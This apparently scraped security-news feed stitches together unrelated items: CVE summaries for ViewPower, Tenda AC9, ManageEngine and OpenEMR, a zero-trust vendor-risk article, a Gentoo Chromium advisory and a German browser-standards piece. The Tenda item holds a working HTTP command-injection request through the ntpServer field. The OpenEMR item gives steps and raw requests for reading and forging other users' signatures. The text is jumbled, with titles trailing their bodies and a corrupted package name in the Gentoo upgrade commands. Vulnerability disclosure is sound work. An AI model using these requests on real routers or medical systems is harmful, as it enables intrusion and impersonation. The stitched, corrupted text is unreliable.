Whitepaper called Race Against the Sandbox - Root Cause Analysis of a Tianfu Cup bug that used a Ntoskrnl bug to escape the Google Chrome sandbox.

Race Against The Sandbox

upsMonitor in ViewPower (aka ViewPowerHTML) 1.04-21012 through 1.04-21353 has insecure permissions for the service binary that enable an Authenticated User to modify files, allowing for privilege escalation.

 ViewPower Management Software 

**ViewPowerHTML 1.04-21353** is an advanced UPS management software. It allows remote monitor and manage from one to multiple UPSs in a networked environment, either LAN or INTERNET. It can not only prevent data loss from power outage and safely shutdown systems, but also store programming data and scheduled shutdown UPSs.  

  

**Feature summary:**  
• Allows control and monitoring of multiple UPSs via LAN and INTERNET  
• Supports auto and manual online upgrade  
• User-friendly power analysis graph: event statistics, history data chart export  
• Real-time dynamic graphs of UPS data (voltage, frequency, load level, battery level)  
• Safely OS shutdown and protection from data loss during power failure  
• Warning notifications via audible alarm, broadcast, mobile messenger, and e-mail  
• Scheduled UPS on/off, battery test, programmable outlet control, and audible alarm control  
• Password security protection and remote access management  
• Supports multiple languages: English, Chinese, French, German, Spanish, Russian, Portuguese, Ukrainian, Italian, Polish, Czech, Turkish   Download the software according to your requested operation system in your computer system. Supported browser versions include IE browser (not support the version older than IE10), Google, Chrome, Firefox,. All browers should support html5.

Software Version

Type

Download Link

Supported OS

ViewPower Network Edition  

Software for Windows® (V.HTML 1.04-21353)

Windows® 7 / 8 / 10 (32-bit & x64-bit) / 11  
Windows® Server 2012 / 2016 / Windows SBS 2011

Windows XP 2003 /2008

Windows® Server 2019 (32-bit & x64-bit)

User Manual

Windows® 7 / 8 / 10 (32-bit & x64-bit) / 11  
Windows® Server 2012 / 2016 / 2019 (32-bit & x64-bit) Windows SBS 2011

Software for MAC x86-64 (V.HTML 1.04-21353) Intel Chip

Mac OS 10.6/10.7/10.8/10.9/10.10/10.11/10.12/10.13/10.14/10.15 /11.x (intel x64-bit)

Software for MAC x86-64 (V.HTML 1.04-21353) M1 Chip

Mac OS 11.x (M1)

Software for Linux  
(V.HTML 1.04-21353)

Graphic mode operation:

Linux Cent OS 5/ 6 / 7 (32-bit )  
Linux Debian 6.x/8.x/10.x (32bit)  
Linux Fedora 5/ 17 (32bit)  
Linux Mint 14.x/19.x (32bit)  
Linux OpenSUSE 10/ 11 / 12/ 13 (32bit)  
Linux RedHat Enterprise AS3, AS5 AS6 (32bit)  
Linux RedHat Enterprise 5/8/9 (32-bit)  
Linux Ubuntu 8/ 9/ 10/ 12/ 14/ 15/ 16 (32-bit )  

Text mode operation:

Graphic mode operation:

Linux CentOS 5/ 6/ 7/ 8 (64bit)  
Linux Debian 6/ 7/ 8/ 10 (64bit)  
Linux Fedora 5/ 17/ 33 (64-bit)  
Linux Mint 19/ 20 (64bit)  
Linux OpenSUSE 10/ 11/ 12/ 13 (64bit)  
Linux RedHat Enterprise AS6 (64bit)  
Linux SUSE 10/ 11/ 12 (64bit)  
Linux Ubuntu 10/ 11/ 12/ 14/ 15/ 16/ 18/ 19/ 20 (64bit)  

Text mode operation:

ESXI Shutdown Wizard

User Manual

ESXI 4.x/ 5.x/6.x

CVE-2021-30490: Software download for Uninterruptible Power Supply

Tenda AC9 V15.03.2.21_cn is vulnerable to command injection via goform/SetSysTimeCfg.

The parameter Ntpserver is passed to tip\_sntp\_handle->doSystemCmd. A command injection vulnerability was formed.

    POST /goform/SetSysTimeCfg HTTP/1.1
    Host: 192.168.0.1
    Content-Length: 76
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://192.168.0.1
    Referer: http://192.168.0.1/system_time.html?random=0.9150451753353981&
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: password=25f9e794323b453885f5181f1b624d0btjotgb
    Connection: close
    
    timePeriod=86400&ntpServer="time.windows.com| ls > /tmp/f0und"&timeZone=20%3A00

CVE-2022-36273: CVEIDs/TendaAC9 at main · F0und-icu/CVEIDs

Directory Traversal vulnerability ZDBQAREFSUBDIR parameter in /zropusermgmt API in Zoho ManageEngine Analytics Plus before 4350 allows remote attackers to run arbitrary code.

CVE-2020-21642: ManageEngine Analytics Plus | Release Notes

ZTNA brings only marginal benefits unless you ensure that the third parties you authorize are not already compromised.

The transition to a zero-trust architecture is rife with challenges that can put a 10,000-piece, monochromatic jigsaw puzzle to shame. Not only must the IT team recognize and validate every corporate employee, their computing devices, and their applications, but they also must do so for key nonemployees, third-party vendors, and partners who access corporate assets.

It is a difficult enough task when one knows who their primary third-party supply chain partners are; it becomes almost impossible to manage secondary, tertiary, and other partners as well. And therein lies the challenge of defining who is an authorized and authenticated user and who is not.

While many of today's zero-trust network access (ZTNA) products claim to offer ongoing authentication and authorization of every known and registered user, device, and application trying to access a network all the time, often what companies actually experience is slightly different, says Jason Georgi, field CTO at Palo Alto Networks. Instead of constant authentication, they get initial authentication for each access.

Today, he says, ZTNA products excel at the microsegmentation of networks and providing very limited access to corporate assets on the network, but he expects next-generation ZTNA products to provide greater security for the data being processed.

A white paper by John Grady, a senior analyst at Enterprise Strategy Group, and commissioned by Palo Alto Networks asserts that there are several areas where current ZTNA products are falling short. Among the improvements Grady called for are prevention of violations of least privilege, the ability to cancel an application's access if it starts behaving in an unanticipated or unacceptable manner after granted access, and the ability to do security inspections of data not currently being inspected.

**Reducing Third-Party Risk**

Companies working to improve their risk profile by employing ZTNA are gaining only marginal benefits if they do not ensure that the third parties they authorize are not already compromised. To accomplish this, companies moving to zero trust also need to improve their third-party risk management (TPRM).

Organizations that employ ZTNA require that remote users be entered into a Microsoft Active Directory or other authentication system. While that works well for remote employees, it falls short when the remote access user is a business partner or vendor. Because of this, these partners often need to access the corporate environment over a virtual private network (VPN). But VPNs have inherent security limitations and do not scale well. As a result, someone who uses a VPN to access corporate assets behind the corporate firewall already has more access than they require; malicious users could leverage this to attack the network from the inside.

"If you think about all the bad things that have occurred, it's always through that backdoor of a vendor connection because you have a wide-open pipe on a VPN," says Dave Cronin, vice president of cybersecurity strategy for Capgemini Americas.

But VPNs, despite having less comprehensive security than zero-trust offerings, are not going away, he cautions. A zero-trust architecture requires that every user be preauthorized within a trusted environment, such as by being listed in Microsoft Active Directory or some similar application. That will not happen when organizations have hundreds or thousands of supply chain partners who are not individually identified, authenticated, and registered.

"In a lot of cases, organizations are layering additional sets of controls around specifically the third-party access component because, in some cases, the third parties are using unmanaged devices, meaning they're using their own corporate devices or even personal devices to access a company's enterprise applications," says Andrew Rafla, a partner and principal, as well as the cyber-risk and zero trust leader, at Deloitte. "There's a greater need to shift toward more modern ZTNA or \[Secure Access Service Edge\] SASE-type solutions, specifically for third-party access."

Rafla adds that the zero-trust edge (ZTE), sometimes referred to as SASE, can be seen as a compensating control to help mitigate the potential threats brought on by third parties and other managed constituents. Such compensating controls — including edge security, TPRM, multifactor authentication, and perhaps a dozen more controls together — can help companies demonstrate that they should qualify for cyber insurance, which has become more difficult to obtain recently.

"The more agile you are able to be as an organization to enable remote workforces, the easier, generally speaking, it is for you to do the right thing for derisking third-party access to your application systems environments," says Josh Yavor, CISO at Tessian. "The reason for that is because by pushing security down to the devices and then to the application layer, it means that while the networks are absolutely still relevant and critical, we're logically building our defensive risk bubbles around the applications themselves, and then the devices and identities that are in use when accessing them.

"By separating what used to be entirely network-dependent thinking to those layers, it means that we have more granular options for enabling access securely from our third parties."

That said, while hybrid VPN and ZTNA networks are likely here to stay for the foreseeable future, VPN security needs to be enhanced by adding more authentication controls and the ability to shut down the connection should the user access inappropriate data or applications. This could include improving port and protocol controls to contain the risk.

Transitioning From VPNs to Zero-Trust Access Requires Shoring Up Third-Party Risk Management

Improper Access Control in GitHub repository openemr/openemr prior to 7.0.0.1.

**Description**

I observed that users can view any user's signature by changing their user parameter to other's user parameter. By the same way users can create/delete/update other's signature in create signature function.

**View/Get other's signature:**

    1. Login to an account (I use account receptionist).
    2. Click "Portal > Portal Audits > Home > Signature on File >  Use Current "  to view your own signature. Intercept this request with Burpsuite. ( Ensure you created your signature before).
    3. Modify user parameter to other's user parameter (I use admin's user parameter which has value is 5) 
    4. Send request, you will see the signature of admin is sent in response.
    

**Create/Update/Delete other's signature:**

    1. Login to an account (I use account receptionist).
    2. Click "Portal > Portal Audits > Home > Signature on File >  {Sign your signature} > Sign and Save "  to create your own signature. Intercept this request with Burpsuite. 
    3. Modify user parameter to other's user parameter (I use admin's user parameter which has value is 5) 
    4. Send this request.
    5. Login with admin account. You will see admin's signature was created.
    

**Proof of Concept****View/Get other's signature:**

    POST /openemr/portal/sign/lib/show-signature.php HTTP/1.1
    Host: demo.openemr.io
    Cookie: OpenEMR=HshnpRzk09lylHKsiGyGQrZDxOUlKlsI2bn-wO0t9g-n8P4h
    Content-Length: 61
    Sec-Ch-Ua: "-Not.A/Brand";v="8", "Chromium";v="102"
    Accept: application/json, text/plain, */*
    Content-Type: application/json
    Sec-Ch-Ua-Mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36
    Sec-Ch-Ua-Platform: "Windows"
    Origin: https://demo.openemr.io
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: https://demo.openemr.io/openemr/portal/patient/provider
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Connection: close
    
    {"pid":"0","user":"5","is_portal":0,"type":"admin-signature"}
    

**Create/Update/Delete other's signature:**

    POST /openemr/portal/sign/lib/save-signature.php HTTP/1.1
    Host: demo.openemr.io
    Cookie: OpenEMR=HshnpRzk09lylHKsiGyGQrZDxOUlKlsI2bn-wO0t9g-n8P4h
    Content-Length: 39622
    Sec-Ch-Ua: "-Not.A/Brand";v="8", "Chromium";v="102"
    Sec-Ch-Ua-Mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36
    Sec-Ch-Ua-Platform: "Windows"
    Content-Type: application/json
    Accept: */*
    Origin: https://demo.openemr.io
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: https://demo.openemr.io/openemr/portal/patient/provider
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Connection: close
    
    {"pid":"0","user":"5","is_portal":0,"signer":"Barbara Wallace","type":"admin-signature","output":"content of signature image in base64"
    

**Impact**

Attacker can get/create/update any user's signature including admin's signature. As a result, he/she can impersonate admin or anyone to perform actions.

**Occurrences**

CVE-2022-2824: User can do all actives with  other's signature (view, get, create, update, delete,...) in openemr

Gentoo Linux Security Advisory 202208-25 - Multiple vulnerabilities have been found in Chromium and its derivatives, the worst of which could result in remote code execution. Versions less than 5.15.5_p20220618>= are affected.

    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -Gentoo Linux Security Advisory                           GLSA 202208-25- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -                                           https://security.gentoo.org/- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High    Title: Chromium, Google Chrome, Microsoft Edge, QtWebEngine: Multiple Vulnerabilities     Date: August 14, 2022     Bugs: #828519, #834477, #835397, #836011, #836381, #836777, #838049, #838433, #841371, #843728, #847370, #851003, #853643, #773040, #787950, #800181, #810781, #815397, #829161, #835761, #836830, #847613, #853229, #837497, #838682, #843035, #848864, #851009, #854372       ID: 202208-25- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -Synopsis=======Multiple vulnerabilities have been found in Chromium and itsderivatives, the worst of which could result in remote code execution.Background=========Chromium is an open-source browser project that aims to build a safer,faster, and more stable way for all users to experience the web.Google Chrome is one fast, simple, and secure browser for all yourdevices.Microsoft Edge is a browser that combines a minimal design withsophisticated technology to make the web faster, safer, and easier.Affected packages================    -------------------------------------------------------------------     Package              /     Vulnerable     /            Unaffected    -------------------------------------------------------------------  1  dev-qt/qtwebengine         < 5.15.5_p20220618>= 5.15.5_p20220618  2  www-client/chromium        < 103.0.5060.53      >= 103.0.5060.53  3  www-client/google-chrome   < 103.0.5060.53      >= 103.0.5060.53  4  www-client/microsoft-edge  < 101.0.1210.47      >= 101.0.1210.47Description==========Multiple vulnerabilities have been discovered in Chromium and itsderivatives. Please review the CVE identifiers referenced below fordetails.Impact=====Please review the referenced CVE identifiers for details.Workaround=========There is no known workaround at this time.Resolution=========All Chromium users should upgrade to the latest version:  # emerge --sync  # emerge --ask --oneshot --verbose ">=www-client/chromium-103.0.5060.53"All Chromium binary users should upgrade to the latest version:  # emerge --sync  # emerge --ask --oneshot --verbose ">=www-client/chromium-bin-103.0.5060.53"All Google Chrome users should upgrade to the latest version:  # emerge --sync  # emerge --ask --oneshot --verbose ">=www-client/google-chrome-103.0.5060.53"All Microsoft Edge users should upgrade to the latest version:  # emerge --sync  # emerge --ask --oneshot --verbose ">=www-client/chromium-103.0.5060.53"All QtWebEngine users should upgrade to the latest version:  # emerge --sync  # emerge --ask --oneshot --verbose ">Þv-qt/qtwebengine-5.15.5_p20220618"References=========[ 1 ] CVE-2021-4052      https://nvd.nist.gov/vuln/detail/CVE-2021-4052[ 2 ] CVE-2021-4053      https://nvd.nist.gov/vuln/detail/CVE-2021-4053[ 3 ] CVE-2021-4054      https://nvd.nist.gov/vuln/detail/CVE-2021-4054[ 4 ] CVE-2021-4055      https://nvd.nist.gov/vuln/detail/CVE-2021-4055[ 5 ] CVE-2021-4056      https://nvd.nist.gov/vuln/detail/CVE-2021-4056[ 6 ] CVE-2021-4057      https://nvd.nist.gov/vuln/detail/CVE-2021-4057[ 7 ] CVE-2021-4058      https://nvd.nist.gov/vuln/detail/CVE-2021-4058[ 8 ] CVE-2021-4059      https://nvd.nist.gov/vuln/detail/CVE-2021-4059[ 9 ] CVE-2021-4061      https://nvd.nist.gov/vuln/detail/CVE-2021-4061[ 10 ] CVE-2021-4062      https://nvd.nist.gov/vuln/detail/CVE-2021-4062[ 11 ] CVE-2021-4063      https://nvd.nist.gov/vuln/detail/CVE-2021-4063[ 12 ] CVE-2021-4064      https://nvd.nist.gov/vuln/detail/CVE-2021-4064[ 13 ] CVE-2021-4065      https://nvd.nist.gov/vuln/detail/CVE-2021-4065[ 14 ] CVE-2021-4066      https://nvd.nist.gov/vuln/detail/CVE-2021-4066[ 15 ] CVE-2021-4067      https://nvd.nist.gov/vuln/detail/CVE-2021-4067[ 16 ] CVE-2021-4068      https://nvd.nist.gov/vuln/detail/CVE-2021-4068[ 17 ] CVE-2021-4078      https://nvd.nist.gov/vuln/detail/CVE-2021-4078[ 18 ] CVE-2021-4079      https://nvd.nist.gov/vuln/detail/CVE-2021-4079[ 19 ] CVE-2021-30551      https://nvd.nist.gov/vuln/detail/CVE-2021-30551[ 20 ] CVE-2022-0789      https://nvd.nist.gov/vuln/detail/CVE-2022-0789[ 21 ] CVE-2022-0790      https://nvd.nist.gov/vuln/detail/CVE-2022-0790[ 22 ] CVE-2022-0791      https://nvd.nist.gov/vuln/detail/CVE-2022-0791[ 23 ] CVE-2022-0792      https://nvd.nist.gov/vuln/detail/CVE-2022-0792[ 24 ] CVE-2022-0793      https://nvd.nist.gov/vuln/detail/CVE-2022-0793[ 25 ] CVE-2022-0794      https://nvd.nist.gov/vuln/detail/CVE-2022-0794[ 26 ] CVE-2022-0795      https://nvd.nist.gov/vuln/detail/CVE-2022-0795[ 27 ] CVE-2022-0796      https://nvd.nist.gov/vuln/detail/CVE-2022-0796[ 28 ] CVE-2022-0797      https://nvd.nist.gov/vuln/detail/CVE-2022-0797[ 29 ] CVE-2022-0798      https://nvd.nist.gov/vuln/detail/CVE-2022-0798[ 30 ] CVE-2022-0799      https://nvd.nist.gov/vuln/detail/CVE-2022-0799[ 31 ] CVE-2022-0800      https://nvd.nist.gov/vuln/detail/CVE-2022-0800[ 32 ] CVE-2022-0801      https://nvd.nist.gov/vuln/detail/CVE-2022-0801[ 33 ] CVE-2022-0802      https://nvd.nist.gov/vuln/detail/CVE-2022-0802[ 34 ] CVE-2022-0803      https://nvd.nist.gov/vuln/detail/CVE-2022-0803[ 35 ] CVE-2022-0804      https://nvd.nist.gov/vuln/detail/CVE-2022-0804[ 36 ] CVE-2022-0805      https://nvd.nist.gov/vuln/detail/CVE-2022-0805[ 37 ] CVE-2022-0806      https://nvd.nist.gov/vuln/detail/CVE-2022-0806[ 38 ] CVE-2022-0807      https://nvd.nist.gov/vuln/detail/CVE-2022-0807[ 39 ] CVE-2022-0808      https://nvd.nist.gov/vuln/detail/CVE-2022-0808[ 40 ] CVE-2022-0809      https://nvd.nist.gov/vuln/detail/CVE-2022-0809[ 41 ] CVE-2022-0971      https://nvd.nist.gov/vuln/detail/CVE-2022-0971[ 42 ] CVE-2022-0972      https://nvd.nist.gov/vuln/detail/CVE-2022-0972[ 43 ] CVE-2022-0973      https://nvd.nist.gov/vuln/detail/CVE-2022-0973[ 44 ] CVE-2022-0974      https://nvd.nist.gov/vuln/detail/CVE-2022-0974[ 45 ] CVE-2022-0975      https://nvd.nist.gov/vuln/detail/CVE-2022-0975[ 46 ] CVE-2022-0976      https://nvd.nist.gov/vuln/detail/CVE-2022-0976[ 47 ] CVE-2022-0977      https://nvd.nist.gov/vuln/detail/CVE-2022-0977[ 48 ] CVE-2022-0978      https://nvd.nist.gov/vuln/detail/CVE-2022-0978[ 49 ] CVE-2022-0979      https://nvd.nist.gov/vuln/detail/CVE-2022-0979[ 50 ] CVE-2022-0980      https://nvd.nist.gov/vuln/detail/CVE-2022-0980[ 51 ] CVE-2022-1096      https://nvd.nist.gov/vuln/detail/CVE-2022-1096[ 52 ] CVE-2022-1125      https://nvd.nist.gov/vuln/detail/CVE-2022-1125[ 53 ] CVE-2022-1127      https://nvd.nist.gov/vuln/detail/CVE-2022-1127[ 54 ] CVE-2022-1128      https://nvd.nist.gov/vuln/detail/CVE-2022-1128[ 55 ] CVE-2022-1129      https://nvd.nist.gov/vuln/detail/CVE-2022-1129[ 56 ] CVE-2022-1130      https://nvd.nist.gov/vuln/detail/CVE-2022-1130[ 57 ] CVE-2022-1131      https://nvd.nist.gov/vuln/detail/CVE-2022-1131[ 58 ] CVE-2022-1132      https://nvd.nist.gov/vuln/detail/CVE-2022-1132[ 59 ] CVE-2022-1133      https://nvd.nist.gov/vuln/detail/CVE-2022-1133[ 60 ] CVE-2022-1134      https://nvd.nist.gov/vuln/detail/CVE-2022-1134[ 61 ] CVE-2022-1135      https://nvd.nist.gov/vuln/detail/CVE-2022-1135[ 62 ] CVE-2022-1136      https://nvd.nist.gov/vuln/detail/CVE-2022-1136[ 63 ] CVE-2022-1137      https://nvd.nist.gov/vuln/detail/CVE-2022-1137[ 64 ] CVE-2022-1138      https://nvd.nist.gov/vuln/detail/CVE-2022-1138[ 65 ] CVE-2022-1139      https://nvd.nist.gov/vuln/detail/CVE-2022-1139[ 66 ] CVE-2022-1141      https://nvd.nist.gov/vuln/detail/CVE-2022-1141[ 67 ] CVE-2022-1142      https://nvd.nist.gov/vuln/detail/CVE-2022-1142[ 68 ] CVE-2022-1143      https://nvd.nist.gov/vuln/detail/CVE-2022-1143[ 69 ] CVE-2022-1144      https://nvd.nist.gov/vuln/detail/CVE-2022-1144[ 70 ] CVE-2022-1145      https://nvd.nist.gov/vuln/detail/CVE-2022-1145[ 71 ] CVE-2022-1146      https://nvd.nist.gov/vuln/detail/CVE-2022-1146[ 72 ] CVE-2022-1232      https://nvd.nist.gov/vuln/detail/CVE-2022-1232[ 73 ] CVE-2022-1305      https://nvd.nist.gov/vuln/detail/CVE-2022-1305[ 74 ] CVE-2022-1306      https://nvd.nist.gov/vuln/detail/CVE-2022-1306[ 75 ] CVE-2022-1307      https://nvd.nist.gov/vuln/detail/CVE-2022-1307[ 76 ] CVE-2022-1308      https://nvd.nist.gov/vuln/detail/CVE-2022-1308[ 77 ] CVE-2022-1309      https://nvd.nist.gov/vuln/detail/CVE-2022-1309[ 78 ] CVE-2022-1310      https://nvd.nist.gov/vuln/detail/CVE-2022-1310[ 79 ] CVE-2022-1311      https://nvd.nist.gov/vuln/detail/CVE-2022-1311[ 80 ] CVE-2022-1312      https://nvd.nist.gov/vuln/detail/CVE-2022-1312[ 81 ] CVE-2022-1313      https://nvd.nist.gov/vuln/detail/CVE-2022-1313[ 82 ] CVE-2022-1314      https://nvd.nist.gov/vuln/detail/CVE-2022-1314[ 83 ] CVE-2022-1364      https://nvd.nist.gov/vuln/detail/CVE-2022-1364[ 84 ] CVE-2022-1477      https://nvd.nist.gov/vuln/detail/CVE-2022-1477[ 85 ] CVE-2022-1478      https://nvd.nist.gov/vuln/detail/CVE-2022-1478[ 86 ] CVE-2022-1479      https://nvd.nist.gov/vuln/detail/CVE-2022-1479[ 87 ] CVE-2022-1480      https://nvd.nist.gov/vuln/detail/CVE-2022-1480[ 88 ] CVE-2022-1481      https://nvd.nist.gov/vuln/detail/CVE-2022-1481[ 89 ] CVE-2022-1482      https://nvd.nist.gov/vuln/detail/CVE-2022-1482[ 90 ] CVE-2022-1483      https://nvd.nist.gov/vuln/detail/CVE-2022-1483[ 91 ] CVE-2022-1484      https://nvd.nist.gov/vuln/detail/CVE-2022-1484[ 92 ] CVE-2022-1485      https://nvd.nist.gov/vuln/detail/CVE-2022-1485[ 93 ] CVE-2022-1486      https://nvd.nist.gov/vuln/detail/CVE-2022-1486[ 94 ] CVE-2022-1487      https://nvd.nist.gov/vuln/detail/CVE-2022-1487[ 95 ] CVE-2022-1488      https://nvd.nist.gov/vuln/detail/CVE-2022-1488[ 96 ] CVE-2022-1489      https://nvd.nist.gov/vuln/detail/CVE-2022-1489[ 97 ] CVE-2022-1490      https://nvd.nist.gov/vuln/detail/CVE-2022-1490[ 98 ] CVE-2022-1491      https://nvd.nist.gov/vuln/detail/CVE-2022-1491[ 99 ] CVE-2022-1492      https://nvd.nist.gov/vuln/detail/CVE-2022-1492[ 100 ] CVE-2022-1493      https://nvd.nist.gov/vuln/detail/CVE-2022-1493[ 101 ] CVE-2022-1494      https://nvd.nist.gov/vuln/detail/CVE-2022-1494[ 102 ] CVE-2022-1495      https://nvd.nist.gov/vuln/detail/CVE-2022-1495[ 103 ] CVE-2022-1496      https://nvd.nist.gov/vuln/detail/CVE-2022-1496[ 104 ] CVE-2022-1497      https://nvd.nist.gov/vuln/detail/CVE-2022-1497[ 105 ] CVE-2022-1498      https://nvd.nist.gov/vuln/detail/CVE-2022-1498[ 106 ] CVE-2022-1499      https://nvd.nist.gov/vuln/detail/CVE-2022-1499[ 107 ] CVE-2022-1500      https://nvd.nist.gov/vuln/detail/CVE-2022-1500[ 108 ] CVE-2022-1501      https://nvd.nist.gov/vuln/detail/CVE-2022-1501[ 109 ] CVE-2022-1633      https://nvd.nist.gov/vuln/detail/CVE-2022-1633[ 110 ] CVE-2022-1634      https://nvd.nist.gov/vuln/detail/CVE-2022-1634[ 111 ] CVE-2022-1635      https://nvd.nist.gov/vuln/detail/CVE-2022-1635[ 112 ] CVE-2022-1636      https://nvd.nist.gov/vuln/detail/CVE-2022-1636[ 113 ] CVE-2022-1637      https://nvd.nist.gov/vuln/detail/CVE-2022-1637[ 114 ] CVE-2022-1639      https://nvd.nist.gov/vuln/detail/CVE-2022-1639[ 115 ] CVE-2022-1640      https://nvd.nist.gov/vuln/detail/CVE-2022-1640[ 116 ] CVE-2022-1641      https://nvd.nist.gov/vuln/detail/CVE-2022-1641[ 117 ] CVE-2022-1853      https://nvd.nist.gov/vuln/detail/CVE-2022-1853[ 118 ] CVE-2022-1854      https://nvd.nist.gov/vuln/detail/CVE-2022-1854[ 119 ] CVE-2022-1855      https://nvd.nist.gov/vuln/detail/CVE-2022-1855[ 120 ] CVE-2022-1856      https://nvd.nist.gov/vuln/detail/CVE-2022-1856[ 121 ] CVE-2022-1857      https://nvd.nist.gov/vuln/detail/CVE-2022-1857[ 122 ] CVE-2022-1858      https://nvd.nist.gov/vuln/detail/CVE-2022-1858[ 123 ] CVE-2022-1859      https://nvd.nist.gov/vuln/detail/CVE-2022-1859[ 124 ] CVE-2022-1860      https://nvd.nist.gov/vuln/detail/CVE-2022-1860[ 125 ] CVE-2022-1861      https://nvd.nist.gov/vuln/detail/CVE-2022-1861[ 126 ] CVE-2022-1862      https://nvd.nist.gov/vuln/detail/CVE-2022-1862[ 127 ] CVE-2022-1863      https://nvd.nist.gov/vuln/detail/CVE-2022-1863[ 128 ] CVE-2022-1864      https://nvd.nist.gov/vuln/detail/CVE-2022-1864[ 129 ] CVE-2022-1865      https://nvd.nist.gov/vuln/detail/CVE-2022-1865[ 130 ] CVE-2022-1866      https://nvd.nist.gov/vuln/detail/CVE-2022-1866[ 131 ] CVE-2022-1867      https://nvd.nist.gov/vuln/detail/CVE-2022-1867[ 132 ] CVE-2022-1868      https://nvd.nist.gov/vuln/detail/CVE-2022-1868[ 133 ] CVE-2022-1869      https://nvd.nist.gov/vuln/detail/CVE-2022-1869[ 134 ] CVE-2022-1870      https://nvd.nist.gov/vuln/detail/CVE-2022-1870[ 135 ] CVE-2022-1871      https://nvd.nist.gov/vuln/detail/CVE-2022-1871[ 136 ] CVE-2022-1872      https://nvd.nist.gov/vuln/detail/CVE-2022-1872[ 137 ] CVE-2022-1873      https://nvd.nist.gov/vuln/detail/CVE-2022-1873[ 138 ] CVE-2022-1874      https://nvd.nist.gov/vuln/detail/CVE-2022-1874[ 139 ] CVE-2022-1875      https://nvd.nist.gov/vuln/detail/CVE-2022-1875[ 140 ] CVE-2022-1876      https://nvd.nist.gov/vuln/detail/CVE-2022-1876[ 141 ] CVE-2022-2007      https://nvd.nist.gov/vuln/detail/CVE-2022-2007[ 142 ] CVE-2022-2010      https://nvd.nist.gov/vuln/detail/CVE-2022-2010[ 143 ] CVE-2022-2011      https://nvd.nist.gov/vuln/detail/CVE-2022-2011[ 144 ] CVE-2022-2156      https://nvd.nist.gov/vuln/detail/CVE-2022-2156[ 145 ] CVE-2022-2157      https://nvd.nist.gov/vuln/detail/CVE-2022-2157[ 146 ] CVE-2022-2158      https://nvd.nist.gov/vuln/detail/CVE-2022-2158[ 147 ] CVE-2022-2160      https://nvd.nist.gov/vuln/detail/CVE-2022-2160[ 148 ] CVE-2022-2161      https://nvd.nist.gov/vuln/detail/CVE-2022-2161[ 149 ] CVE-2022-2162      https://nvd.nist.gov/vuln/detail/CVE-2022-2162[ 150 ] CVE-2022-2163      https://nvd.nist.gov/vuln/detail/CVE-2022-2163[ 151 ] CVE-2022-2164      https://nvd.nist.gov/vuln/detail/CVE-2022-2164[ 152 ] CVE-2022-2165      https://nvd.nist.gov/vuln/detail/CVE-2022-2165[ 153 ] CVE-2022-22021      https://nvd.nist.gov/vuln/detail/CVE-2022-22021[ 154 ] CVE-2022-24475      https://nvd.nist.gov/vuln/detail/CVE-2022-24475[ 155 ] CVE-2022-24523      https://nvd.nist.gov/vuln/detail/CVE-2022-24523[ 156 ] CVE-2022-26891      https://nvd.nist.gov/vuln/detail/CVE-2022-26891[ 157 ] CVE-2022-26894      https://nvd.nist.gov/vuln/detail/CVE-2022-26894[ 158 ] CVE-2022-26895      https://nvd.nist.gov/vuln/detail/CVE-2022-26895[ 159 ] CVE-2022-26900      https://nvd.nist.gov/vuln/detail/CVE-2022-26900[ 160 ] CVE-2022-26905      https://nvd.nist.gov/vuln/detail/CVE-2022-26905[ 161 ] CVE-2022-26908      https://nvd.nist.gov/vuln/detail/CVE-2022-26908[ 162 ] CVE-2022-26909      https://nvd.nist.gov/vuln/detail/CVE-2022-26909[ 163 ] CVE-2022-26912      https://nvd.nist.gov/vuln/detail/CVE-2022-26912[ 164 ] CVE-2022-29144      https://nvd.nist.gov/vuln/detail/CVE-2022-29144[ 165 ] CVE-2022-29146      https://nvd.nist.gov/vuln/detail/CVE-2022-29146[ 166 ] CVE-2022-29147      https://nvd.nist.gov/vuln/detail/CVE-2022-29147[ 167 ] CVE-2022-30127      https://nvd.nist.gov/vuln/detail/CVE-2022-30127[ 168 ] CVE-2022-30128      https://nvd.nist.gov/vuln/detail/CVE-2022-30128[ 169 ] CVE-2022-30192      https://nvd.nist.gov/vuln/detail/CVE-2022-30192[ 170 ] CVE-2022-33638      https://nvd.nist.gov/vuln/detail/CVE-2022-33638[ 171 ] CVE-2022-33639      https://nvd.nist.gov/vuln/detail/CVE-2022-33639Availability===========This GLSA and any updates to it are available for viewing atthe Gentoo Security Website: https://security.gentoo.org/glsa/202208-25Concerns?========Security is a primary focus of Gentoo Linux and ensuring theconfidentiality and security of our users' machines is of utmostimportance to us. Any security concerns should be addressed tosecurity@gentoo.org or alternatively, you may file a bug athttps://bugs.gentoo.org.License======Copyright 2022 Gentoo Foundation, Inc; referenced textbelongs to its owner(s).The contents of this document are licensed under theCreative Commons - Attribution / Share Alike license.https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202208-25

Less celebrated browsers and deprecated applications like Internet Explorer will be browsers non-grata

Stephen Pritchard 15 August 2022 at 14:18 UTC  
Updated: 15 August 2022 at 14:39 UTC

Less celebrated browsers and deprecated applications like Internet Explorer will be browsers non-grata

Germany is mandating the use of secure, modern web browsers across government networks with a proposal for minimum standards currently open to consultation.

The Federal Office for Information Security (BSI) released a draft set of minimum standards in July. The agency hopes that the standards will bolster governmental cyber-resilience and better protect sensitive data. Leading browsers incorporate multiple features that block or mitigate a variety of common web-based attacks.

